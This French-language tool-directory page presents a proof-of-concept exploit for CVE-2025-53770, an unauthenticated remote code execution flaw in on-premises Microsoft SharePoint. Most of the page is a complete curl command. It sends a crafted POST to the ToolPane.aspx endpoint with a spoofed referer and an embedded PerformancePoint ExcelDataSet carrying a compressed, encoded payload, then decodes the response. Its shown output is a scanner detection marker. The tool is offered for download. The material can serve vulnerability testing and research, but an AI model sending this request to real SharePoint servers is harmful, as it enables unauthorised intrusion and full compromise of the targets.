Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-53770 — Exploit de preuve de concept pour l'exécution de code à distance sans authentification via une désérialisation non sécurisée dans Microsoft SharePoint Server (CVE-2025-53770), avec des commandes d'extraction et de décodage de la charge utile. | Kitploit
Outils/GitHubGitHub/0xray5c68616e37/cve-2025-53770
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Exploit de preuve de concept pour l'exécution de code à distance sans authentification via une désérialisation non sécurisée dans Microsoft SharePoint Server (CVE-2025-53770), avec des commandes d'extraction et de décodage de la charge utile.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôtSite web
3il y a 1 anPas encore vérifié

CVE-2025-53770 SharePoint Désérialisation RCE PoC

Critique — Exécution de code à distance non authentifiée via une désérialisation non sécurisée dans Microsoft SharePoint Server (CVE-2025-53770)

Description

La désérialisation de données non fiables dans Microsoft SharePoint Server sur site permet à un attaquant d'exécuter du code à distance et de compromettre le système. Microsoft est conscient de l'exploitation active et prépare une mise à jour complète. Assurez-vous que les mesures d'atténuation de la documentation CVE sont en place.

  • Impact : Les attaquants non authentifiés peuvent atteindre une exécution de code à distance, entraînant une compromission complète du système.
  • Sévérité : Critique

Preuve de concept

La preuve de concept suivante montre comment un attaquant peut exploiter la vulnérabilité pour extraire et décoder des charges utiles malveillantes via le point de terminaison vulnérable.

Le domaine cible est intentionnellement remplacé par reeaccated.com.

Commande

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Sortie

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
image

Références

  • Implémentation de la charge utile de test
  • Analyse de sécurité Code White
  • Guide Microsoft
  • Entrée NVD

Impact :
Les attaquants non authentifiés peuvent exploiter une désérialisation non sécurisée pour exécuter du code à distance sur SharePoint Server, entraînant une compromission complète du système.

Télécharger l’outil